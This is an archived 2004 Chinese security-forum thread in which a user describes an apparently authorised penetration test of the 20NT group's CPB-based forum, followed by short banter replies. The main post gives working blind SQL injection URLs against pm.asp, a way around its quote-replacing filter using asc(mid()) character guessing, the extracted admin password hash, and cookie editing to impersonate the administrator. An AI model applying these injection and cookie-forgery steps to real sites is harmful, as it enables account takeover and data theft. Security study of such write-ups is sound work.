Board logo

标题: 记一次对20NT安全小组的渗透测试 [打印本页]
作者: 凌哥    时间: 2004-4-24 16:23     标题: 记一次对20NT安全小组的渗透测试

一天上网溜达的时候好友紫侠客叫我去帮他打理打理20NT的论坛,那段时间正好闲着没事,就答应了。注册后发现短信箱里有一封欢迎来到20NT,奖励我XX两银子的短信息(怎么平时没见有人送我点RMB啊...浪心在后面大怒道:给你银子花还在这里不老实,兄弟们给我上啊。)。可是那个短消息窗口总是不断的跳出来很让人有点想法,于是准备看看这个坛子的安全性。   论坛最下面的信息显示这个论坛为DVBBS的,但是从论坛的文件名来看又不像(后来紫侠客告诉我这个论坛的名字是CPB),也许是自己修改了一下吧,不管他。先是找出了查看短信息时的URL,准备看看有没有注入漏洞;递交: 引用: -------------------------------------------------------------------------------- /iisHelp/common/500-100.asp,行242 ADODB.Field 错误 '80020009' BOF 或 EOF 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 /20ntbbs/pm.asp/pm.asp,行0 --------------------------------------------------------------------------------   经验告诉我,应该是存在注入漏洞的。再来尝试: 代码: -------------------------------------------------------------------------------- http://www.vanboy.net/20ntbbs/pm.asp?mode=kai&q_id=x%20and%200<>(select%20count(*)%20from%20user) --------------------------------------------------------------------------------   这次页面成功显示了,哈哈,很容易的得到了表名、列名等关键信息。查看管理团队的名单,还是拿浪心来开刀吧,浪心别打我哦。先确认一下ID: 代码: -------------------------------------------------------------------------------- http://www.vanboy.net/20ntbbs/pm.asp?mode=kai&q_id=3xxxx%20and%20'浪心'=(select%20username%20from%20user%20where%20username='浪心') --------------------------------------------------------------------------------   呵呵,这次好像出了点意外,返回信息为: 引用: -------------------------------------------------------------------------------- Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' [Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'q_id=4 and ''浪心''=(select username from user where username=''浪心'')' 中。 /20ntbbs/pm.asp,行0 --------------------------------------------------------------------------------   我加进去的语句中包含的单引号'全被替换成了双引号",我想这就是论坛开发人员所犯的一个天真的错误吧,认为只要检查语句中是不是包含单引号,如果发现单引号就把他替换成为双引号就可以完全杜绝SQL注入攻击了。其实我们完全可以饶过他的这个限制继续进行子查询来得到密码。   继续进行查询: 代码: -------------------------------------------------------------------------------- http://www.vanboy.net/20ntbbs/pm.asp?mode=kai&q_id=3xxxx%20and%20exists%20(select%20u_id%20from%20user%20where%20u_id=1%20and%20asc(mid(username,1,1))=-16181) --------------------------------------------------------------------------------   解释一下语句的意思,asc(mid(username,1,1))=xx中使用了二个SQL函数,其中ASC()是把括号中的内容转化成为ASC码,mid(username,1,1)的于是就是把一个内容分成几部分取出,格式为mid(列名,起始位,取出字符的长度),上面句子中的意思就是取出username列中第一位ASC码为-16181,-16181就是浪心的中文ID中的浪的ASC码值。递交上面的URL就不包含单引号了,我们仍然可以达到查询的目的。如果猜对了就会正常返回页面,递交上面的语句返回了正常的页面说明在user表中浪心的id为1,再继续猜密码: 代码: -------------------------------------------------------------------------------- http://www.vanboy.net/20ntbbs/pm.asp?mode=kai&q_id=3xxxx%20and%20exists%20(select%20u_id%20from%20user%20where%20u_id=1%20and%20asc(mid(username,1,1))=-16181%20and%20asc(mid(password,1,1))>120) --------------------------------------------------------------------------------   猜错了,再递交: 代码: -------------------------------------------------------------------------------- http://www.vanboy.net/20ntbbs/pm.asp?mode=kai&q_id=3xxxx%20and%20exists%20(select%20u_id%20from%20user%20where%20u_id=1%20and%20asc(mid(username,1,1))=-16181%20and%20and%20asc(mid(password,1,1))=54) --------------------------------------------------------------------------------   这次成功返回了页面,猜对了,接下来就是漫长的猜解过程,一共是16位经过MD5加密后的密码,在猜解过程中可以使用<、>、=来快速定位ASC码值。经过N次失败后终于猜解出密码为:6957b753780exxxx,在前面我们已经得到浪心的userid为1,现在就只需要进行COOKIE欺骗就可以以管理员的身份进入论坛的前台操作了。   用IECookiesView找到名字为www.vanboy.net的COOKIE,进行编辑。把userid、password和username修改成以下内容: 引用: -------------------------------------------------------------------------------- userid=1&password=6957b753780e548c&username=浪心 --------------------------------------------------------------------------------   保存后,在IE里输入论坛的URL试试,呵呵,变成浪心了。发个贴纪念一下,就可以闪人了。如果想得到后台的管理密码,而进一步渗透,那还是一样,查询admin表中的username和password再进行破解就可以了。   这次用简单的注入获得了CPB论坛的管理权限,虽然有一点麻烦,但是CPB论坛所设置的防范注入的措施对于一个熟悉SQL语句和注入的人根本不算什么难题。而CPB论坛也就因为这样,很多页面都存在注入缺陷,如:pm.asp、list.asp和topic.asp等等都存在这样的缺陷,我已经通知CPB的开发人员编写补丁程序,另外此次对20NT的论坛渗透测试是在获得准许的情况下进行的,而且已经修补好漏洞,请不要对其进行恶意攻击!
作者: 断肠具断    时间: 2004-4-24 22:39     标题: 记一次对20NT安全小组的渗透测试

嘿嘿
飘逸的风
大家自己人上QQ说
作者: 凌哥    时间: 2004-4-25 02:18     标题: 记一次对20NT安全小组的渗透测试

呵呵
"断"子绝孙
你还能认出我呀~
作者: 断肠具断    时间: 2004-4-25 06:14     标题: 记一次对20NT安全小组的渗透测试

这个破地方没什么好的
鸟人一堆
发出的帖子自己都没试过
活该被黑
走了
再也不来了
有时间上IRC找我
我24小时挂着
作者: 数码鸟    时间: 2004-4-25 10:44     标题: 记一次对20NT安全小组的渗透测试

呵呵 不错 不错
下面引用由断肠具断2004/04/25 06:14am 发表的内容:
这个破地方没什么好的
...
   破地方是指20NT还是海岸线?
作者: 凌哥    时间: 2004-4-26 17:10     标题: 记一次对20NT安全小组的渗透测试

呵呵
不用管他拉
他那人就那样,喜欢开玩笑~
不用在意~~




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2